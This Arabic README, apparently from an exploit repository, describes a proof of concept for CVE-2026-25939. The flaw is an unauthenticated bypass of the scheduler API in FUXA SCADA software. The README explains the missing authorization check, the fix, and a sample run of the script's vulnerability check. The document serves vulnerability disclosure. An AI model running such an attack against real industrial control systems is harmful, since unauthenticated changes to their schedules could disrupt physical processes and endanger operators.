
إثبات مفهوم لاستغلال CVE-2026-25939، وهو تجاوز للتفويض دون مصادقة في برنامج FUXA SCADA يسمح بالتلاعب التعسفي بجدولة المهام واحتمال تنفيذ أوامر عن بُعد (RCE).
محمد إدريس بن يامر باحث أمني
يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لثغرة CVE-2026-25939، وهي ثغرة حرجة في تجاوز صلاحيات التفويض في FUXA (برنامج مفتوح المصدر لأنظمة SCADA/ICS). تسمح الثغرة للمهاجمين عن بُعد دون مصادقة بإنشاء وتعديل وحذف إدخالات المجدول (scheduler) بشكل تعسفي، مما قد يؤدي إلى تنفيذ كود عن بُعد والتلاعب بأنظمة التحكم الصناعي.
توجد الثغرة في نقطة النهاية /api/scheduler حيث كانت فحوصات مصادقة المستخدم الضيف مفقودة في معالجات POST و DELETE. أضاف التصحيح في الإصدار v1.2.11 تحققًا صريحًا عبر authJwt.isGuestUser().
POST /api/scheduler - إنشاء/تعديل المجدولاتDELETE /api/scheduler - حذف المجدولاتمثال 1: تقييم الثغرة
docker run -p 1881:1881 -d fuxa:v1.2.10
$ python CVE-2026-25939.py http://192.168.1.100:1881 --check
[*] Checking vulnerability status for http://192.168.1.100:1881
[*] Testing guest access to scheduler API...
[*] GET Response Status: 200
[*] Testing scheduler creation...
[*] POST Response Status: 200
[!] VULNERABLE: Target accepts unauthenticated scheduler creation
[!] This indicates version < 1.2.11